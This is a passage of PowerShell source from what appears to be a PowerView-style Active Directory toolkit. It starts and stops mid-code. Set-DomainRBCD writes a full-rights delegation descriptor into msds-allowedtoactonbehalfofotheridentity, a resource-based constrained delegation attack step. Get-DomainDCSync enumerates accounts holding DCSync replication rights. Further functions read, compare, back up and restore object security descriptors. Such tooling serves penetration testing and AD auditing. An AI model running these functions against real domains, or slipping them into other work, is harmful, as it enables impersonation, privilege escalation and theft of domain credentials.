'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $RBCDSearcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        #bind dynamic parameter to a friendly variable\n        if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {\n            New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters\n        }\n        if ($RBCDSearcher) {\n            $IdentityFilter = ''\n            $Filter = ''\n\n            # form SDDL string and resulting SD bytes\n            $SDDLString = ''\n            if ($PSBoundParameters['DelegateFrom']) {\n                $DelegateFilter = ''\n                $DelegateFrom.Split('|') | Get-IdentityFilterString | ForEach-Object {\n                    $DelegateFilter += $_\n                    Write-Verbose \"[Set-DomainRBCD] Appending DelegateFilter: $_\"\n                }\n\n                $RBCDSearcher.filter = \"(|$DelegateFilter)\"\n                Write-Verbose \"[Set-DomainRBCD] Set-DomainRBCD filter string: $($RBCDSearcher.filter)\"\n                $Results = $RBCDSearcher.FindAll()\n                if ($Results) {\n                    $SDDLString = 'O:BAD:'\n                }\n                $Results | Where-Object {$_} | ForEach-Object {\n                    $Object = Convert-LDAPProperty -Properties $_.Properties\n                    $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject')\n                    $SDDLString += \"(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($Object.objectsid))\"\n                    Write-Verbose \"[Set-DomainRBCD] Appending to SDDL string: (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($Object.objectsid))\"\n                }\n                if ($Results) {\n                    try { $Results.dispose() }\n                    catch {\n                        Write-Verbose \"[Set-DomainRBCD] Error disposing of the Results object: $_\"\n                    }\n                }\n                Write-Verbose \"[Set-DomainRBCD] Using SDDL string: $SDDLString\"\n                $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $SDDLString\n                $SDBytes = New-Object byte[] ($SD.BinaryLength)\n                $SD.GetBinaryForm($SDBytes, 0)\n\n            }\n            \n            $IdentityParts = $Identity -split '\\\\'\n            if ($IdentityParts.length -gt 1) {\n                $SearcherArguments['Domain'] = $IdentityParts[0]\n                $Identity = $IdentityParts[1]\n            }\n            $IdentitySearcher = Get-DomainSearcher @SearcherArguments\n            $Identity | Get-IdentityFilterString | ForEach-Object {\n                $IdentityFilter += $_\n            }\n            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                $Filter = \"(|$IdentityFilter)\"\n            }\n\n            if ($PSBoundParameters['LDAPFilter']) {\n                Write-Verbose \"[Set-DomainRBCD] Using additional LDAP filter: $LDAPFilter\"\n                $Filter += \"$LDAPFilter\"\n            }\n            if ($Filter -and $Filter -ne '') {\n                $IdentitySearcher.filter = \"(&$Filter)\"\n            }\n            Write-Verbose \"[Set-DomainRBCD] Set-DomainRBCD filter string: $($RBCDSearcher.filter)\"\n\n            if ($PSBoundParameters['FindOne']) { $Results = $RBCDSearcher.FindOne() }\n            else { $Results = $IdentitySearcher.FindAll() }\n            $Results | Where-Object {$_} | ForEach-Object {\n                $Object = $_\n                $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw')\n                $Entry = $Object.GetDirectoryEntry()\n                try {\n                    Write-Verbose \"[Set-DomainRBCD] Setting 'msds-allowedtoactonbehalfofotheridentity' to '$SDBytes' for object '$($Object.Properties.samaccountname)'\"\n                    if ($SDBytes) {\n                        $Entry.put('msds-allowedtoactonbehalfofotheridentity', $SDBytes)\n                    }\n                    elseif ($PSBoundParameters['Clear']) {\n                        $Entry.Properties['msds-allowedtoactonbehalfofotheridentity'].Clear()\n                    }\n                    $Entry.commitchanges()\n                }\n                catch {\n                    Write-Warning \"[Set-DomainRBCD] Error setting/replacing properties for object '$($Object.Properties.samaccountname)' : $SDBytes\"\n                }\n\n            }\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Set-DomainRBCD] Error disposing of the Results object: $_\"\n                }\n            }\n            $RBCDSearcher.dispose()\n        }\n    }\n}\n\nfunction Get-IdentityFilterString {\n<#\n.SYNOPSIS\n\nHelper function to retrieve the IdentityFilter string to avoid code duplication.\nPulled from @harmj0y's Get-DomainUser function.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.PARAMETER Identity\n\nA SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\nor a dns host name (e.g. windows10.testlab.local). Wildcards accepted.\n\n.EXAMPLE\n\nGet-IdentityFilterString -Identity $Identity\n\nReturns an LDAP search string for provided identites\n#>\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('SamAccountName', 'Name', 'DNSHostName')]\n        [String[]]\n        $Identity\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n    }\n\n    PROCESS {\n        $IdentityFilter = ''\n        $Filter = ''\n        $Identity | Where-Object {$_} | ForEach-Object {\n            $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n            if ($IdentityInstance -match '^S-1-') {\n                $IdentityFilter += \"(objectsid=$IdentityInstance)\"\n            }\n            elseif ($IdentityInstance -match '^(CN|OU|DC)=') {\n                $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                    # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                    #   and rebuild the domain searcher\n                    $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                    Write-Verbose \"[Get-IdentityFilterString] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                    #$SearcherArguments['Domain'] = $IdentityDomain\n                    #if (-not $ObjectSearcher) {\n                        #Write-Warning \"[Get-IdentityFilterString] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                    #}\n                }\n            }\n            elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {\n                $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\\' + $_.ToString('X2') }) -join ''\n                $IdentityFilter += \"(objectguid=$GuidByteString)\"\n            }\n            elseif ($IdentityInstance.Contains('\\')) {\n                $ConvertedIdentityInstance = $IdentityInstance.Replace('\\28', '(').Replace('\\29', ')') | Convert-ADName -OutputType Canonical\n                if ($ConvertedIdentityInstance) {\n                    $ObjectDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))\n                    $ObjectName = $IdentityInstance.Split('\\')[1]\n                    $IdentityFilter += \"(samAccountName=$ObjectName)\"\n                    #$SearcherArguments['Domain'] = $ObjectDomain\n                    Write-Verbose \"[Get-IdentityFilterString] Extracted domain '$ObjectDomain' from '$IdentityInstance'\"\n                }\n            }\n            elseif ($IdentityInstance.Contains('.')) {\n                $IdentityFilter += \"(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))\"\n            }\n            else {\n                $IdentityFilter += \"(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))\"\n            }\n        }\n        if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n            $Filter += \"(|$IdentityFilter)\"\n        }\n        $Filter\n    }\n}\n\n\n\nfunction Get-DomainDCSync {\n<#\n.SYNOPSIS\n\nFinds accounts that have DCSync privileges.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.PARAMETER Users\n\nSwitch. Return user accounts.\n\n.PARAMETER Computers\n\nSwitch. Return computer accounts.\n\n.PARAMETER Groups\n\nSwitch. Return groups.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.EXAMPLE\n\nGet-DomainDCSync\n\nReturns accounts that have DCSync privileges in current domain.\n#>\n    [OutputType('PowerView.ADObject')]\n    [OutputType('PowerView.ADObject.Raw')]\n    [CmdletBinding()]\n    Param (\n        [Switch]\n        $Users,\n\n        [Switch]\n        $Computers,\n\n        [Switch]\n        $Groups,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        $DNSearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain; $DNSearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server; $DNSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $ObjectSearcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        $DomainDN = Get-DomainDN @DNSearcherArguments\n        Write-Verbose \"[Get-DomainDCSync] Retrieved the domain distinguishedname: $DomainDN\"\n\n        # Hash Table for storing DCSync privileges\n        $Privs = @{}\n\n        # Are any type filters set?\n        $NoType = $True\n        if ($PSBoundParameters['Users'] -or $PSBoundParameters['Computers'] -or $PSBoundParameters['Groups']) {\n            $NoType = $False\n        }\n\n        # Loop through ACL on the domain head\n        Get-DomainObjectACL $DomainDN -RightsFilter DCSync @SearcherArguments | ForEach-Object {\n            $ACE = $_\n            $SID = $ACE.SecurityIdentifier.Value\n            $ADRights = $ACE.ActiveDirectoryRights\n            if ($ADRights -eq 'GenericAll' -or ($ADRights -eq 'ExtendedRight' -and !($ACE.ObjectAceType) -and !($ACE.InheritedObjectAceType))) {\n                $Privs.$SID = @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2')\n            }\n            else {\n                $ACEType = $ACE.ObjectAceType.Guid\n                if (!($Privs.keys -contains $SID)) {\n                    $Privs.Add($SID, @($ACEType))\n                }\n                elseif (!($Privs.$SID -contains $ACEType)) {\n                    $Privs.$SID += $ACEType\n                }\n            }\n        }\n\n        # Initial account type filter\n        $Filter = ''\n        $TypeFilter = ''\n        $IdentityFilter = ''\n        if ($PSBoundParameters['Users']) {\n            $TypeFilter += '(samAccountType=805306368)'\n        }\n        if ($PSBoundParameters['Computers']) {\n            $TypeFilter += '(samAccountType=805306369)'\n        }\n        if ($PSBoundParameters['Groups']) {\n            $TypeFilter += '(objectCategory=group)'\n        }\n        if ($TypeFilter -and ($TypeFilter.Trim() -ne '')) {\n            $Filter = \"(|$TypeFilter)\"\n        }\n        else {\n            $Filter = '(|(samAccountType=805306368)(samAccountType=805306369))'\n        }\n\n        # Keep track of SIDs that have been added\n        $Check = @()\n\n        $Privs.keys | ForEach-Object {\n            if ($Privs.$_.Contains('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2') -and $Privs.$_.Contains('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2')) {\n                $Object = Get-DomainObject $_\n                if ($Object) {\n                    $ObjectSID = $Object.objectsid\n                    if ($Object.objectclass -contains 'group') {\n                        if ($PSBoundParameters['Groups'] -and !($Check -contains $ObjectSID)) {\n                            $IdentityFilter += \"(objectsid=$ObjectSID)\"\n                        }\n                        $Object | Get-DomainGroupMember -Recurse @SearcherArguments | ForEach-Object {\n                            $MemberSID = $_.MemberSID\n                            if ($_.MemberObjectClass -ne 'group' -and !($Check -contains $MemberSID)) {\n                                if (($NoType) -Or ((($PSBoundParameters['Users']) -And ($_.MemberObjectClass -eq 'user')) -Or (($PSBoundParameters['Computers']) -And ($_.MemberObjectClass -eq 'computer')))) {\n                                    $IdentityFilter += \"(objectsid=$MemberSID)\"\n                                }\n                            }\n                            elseif (!($Check -contains $MemberSID)) {\n                                if ($PSBoundParameters['Groups']) {\n                                    $IdentityFilter += \"(objectsid=$MemberSID)\"\n                                }\n                            }\n                            $Check += $MemberSID\n                        }\n                    }\n                    elseif (!($Check -contains $ObjectSID)) {\n                        if (($NoType) -Or ((($PSBoundParameters['Users']) -And ($Object.samaccounttype -eq 'USER_OBJECT')) -Or (($PSBoundParameters['Computers']) -And ($Object.samaccounttype -eq 'MACHINE_ACCOUNT')))) {\n                            $IdentityFilter += \"(objectsid=$ObjectSID)\"\n                        }\n                    }\n                    $Check += $ObjectSID\n                }\n            }\n        }\n\n        if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n            $Filter += \"(|$IdentityFilter)\"\n        }\n\n        if ($PSBoundParameters['LDAPFilter']) {\n            Write-Verbose \"[Get-DomainDCSync] Using additional LDAP filter: $LDAPFilter\"\n            $Filter += \"$LDAPFilter\"\n        }\n\n        if ($Filter -and $Filter -ne '') {\n            $ObjectSearcher.filter = \"(&$Filter)\"\n        }\n        Write-Verbose \"[Get-DomainDCSync] Get-DomainDCSync filter string: $($ObjectSearcher.filter)\"\n\n        if ($PSBoundParameters['FindOne']) { $Results = $ObjectSearcher.FindOne() }\n        else { $Results = $ObjectSearcher.FindAll() }\n        $Results | Where-Object {$_} | ForEach-Object {\n            if ($PSBoundParameters['Raw']) {\n                # return raw result objects\n                $Object = $_\n                $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw')\n            }\n            else {\n                $Object = Convert-LDAPProperty -Properties $_.Properties\n                $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject')\n            }\n\n            $Object\n        }\n        if ($Results) {\n            try { $Results.dispose() }\n            catch {\n                Write-Verbose \"[Get-DomainDCSync] Error disposing of the Results object: $_\"\n            }\n        }\n        $ObjectSearcher.dispose()\n\n    }\n}\n\nfunction Get-DomainObjectSD {\n<#\n.SYNOPSIS\n\nReturns the ACLs associated with a specific active directory object. By default\nthe DACL for the object(s) is returned, but the SACL can be returned with -Sacl.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER OutFile\n\nOutput file of the SD's to be backed up in the CSV format.\n\n.PARAMETER Check\n\nCheck the SD with the provided SD and report if it's the same or different.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nSet-DomainObjectAcl -Identity charlie.clark -Domain testlab.local -SDDLString \"O:S-1-5-21-2042794111-3163024120-2630140754-512G:S-1-5-21-2042794111-3163024120-2630140754-512D:AI(OA;;RP;4c...\"\n\nSet the SD for the charlie.clark user in the testlab.local domain to\nthe SD string specified by SDDLString.\n\n.EXAMPLE\n\nSet-DomainObjectSD -InputFile .\\backup-sds.csv\n\nRestore all of the SD's contained within the file .\\backup-sds.csv.\n\n.OUTPUTS\n\nPSObject\n\nCustom PSObject with ACL entries.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([PSObject])]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $Identity,\n\n        [String]\n        $OutFile,\n\n        [String]\n        $Check,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid'\n        }\n\n        $SearcherArguments['SecurityMasks'] = 'Dacl'\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $Searcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        if ($Searcher) {\n            $Filter = ''\n            $Checks = ''\n            $Identity | Get-IdentityFilterString | ForEach-Object {\n                $Filter += $_\n            }\n            if (!($Filter) -and $PSBoundParameters['Check'] -and (Test-Path -Path $Check -PathType Leaf)) {\n                $Checks = Import-Csv $Check\n                $Checks | ForEach-Object {$Filter += Get-IdentityFilterString $_.ObjectSID}\n            }\n            if ($Filter) {\n                $Searcher.filter = \"(|$Filter)\"\n                Write-Verbose \"[Get-DomainObjectSD] Using filter: $($Searcher.filter)\"\n                $Objects = @()\n                $Results = $Searcher.FindAll()\n                $Results | Where-Object {$_} | ForEach-Object {\n                    $Object = $_.Properties\n\n                    if ($Object.objectsid -and $Object.objectsid[0]) {\n                        $ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value\n                    }\n                    else {\n                        $ObjectSid = $Null\n                    }\n\n                    $SecurityDescriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0\n                    $SDDLObject = New-Object PSObject\n                    $SDDLObject | Add-Member \"ObjectSID\" $ObjectSid\n                    $SDDLObject | Add-Member \"ObjectSDDL\" $SecurityDescriptor.GetSddlForm(15)\n                    if ($Checks) {\n                        $SDDLtoCheck = $Checks | Where-Object {$_.ObjectSID -eq $ObjectSid}\n                        if ($SDDLtoCheck.ObjectSDDL -eq $SDDLObject.ObjectSDDL) {\n                            Write-Verbose \"[Get-DomainObjectSD] SD for $($Object.samaccountname) is the same as the one provided\"\n                        }\n                        else {\n                            Write-Warning \"[Get-DomainObjectSD] SD for $($Object.samaccountname) is different to the one provided\"\n                            $SDDLObject\n                            $Objects += $SDDLObject\n                        }\n                    }\n                    elseif ($PSBoundParameters['Check'] -and $Check -eq $SDDLObject.ObjectSDDL) {\n                        Write-Warning \"[Get-DomainObjectSD] SD for $($Object.samaccountname) is the same as the one provided\"\n                    }\n                    elseif ($PSBoundParameters['Check']) {\n                        Write-Warning \"[Get-DomainObjectSD] SD for $($Object.samaccountname) is different to the one provided\"\n                        $SDDLObject\n                        $Objects += $SDDLObject\n                    }\n                    else {\n                        $SDDLObject\n                        $Objects += $SDDLObject\n                    }\n                }\n                if ($PSBoundParameters['OutFile']) {\n                    try {\n                        Write-Verbose \"[Get-DomainObjectSD] Writing object SD information to $OutFile\"\n                        $Objects | ForEach-Object { Export-Csv -InputObject $_ -Path $OutFile -Append }\n                    }\n                    catch {\n                        Write-Warning \"[Get-DomainObjectSD] Unable to write $OutFile\"\n                    }\n                } \n            }\n        }\n    }\n}\n\n\nfunction Set-DomainObjectSD {\n<#\n.SYNOPSIS\n\nReturns the ACLs associated with a specific active directory object. By default\nthe DACL for the object(s) is returned, but the SACL can be returned with -Sacl.\n\nAuthor: Charlie Clark (@exploitph)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER InputFile\n\nInput file containing the SD's to be restored in the CSV format that Get-DomainObjectSD outputs.\n\n.PARAMETER SDDLString\n\nSDDL String to use to restore the SD for Object(s) specified by Identity.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nSet-DomainObjectAcl -Identity charlie.clark -Domain testlab.local -SDDLString \"O:S-1-5-21-2042794111-3163024120-2630140754-512G:S-1-5-21-2042794111-3163024120-2630140754-512D:AI(OA;;RP;4c...\"\n\nSet the SD for the charlie.clark user in the testlab.local domain to\nthe SD string specified by SDDLString.\n\n.EXAMPLE\n\nSet-DomainObjectSD -InputFile .\\backup-sds.csv\n\nRestore all of the SD's contained within the file .\\backup-sds.csv.\n\n.OUTPUTS\n\nPowerView.ACL\n\nCustom PSObject with ACL entries.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ACL')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $Identity,\n\n        [String]\n        $InputFile,\n\n        [String]\n        $SDDLString,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid'\n        }\n\n        $SearcherArguments['SecurityMasks'] = 'Dacl'\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $Searcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        if ($Searcher) {\n            $RestoreTargets = @{}\n            $Filter = ''\n            if ($PSBoundParameters['InputFile']) {\n                try {\n                    Write-Verbose \"[Set-DomainObjectSD] Reading provided input file: $InputFile\"\n                    Import-Csv $InputFile | ForEach-Object {\n                        $RestoreTargets.Add($_.ObjectSID, $_.ObjectSDDL)\n                    }\n                }\n                catch {\n                    Write-Warning 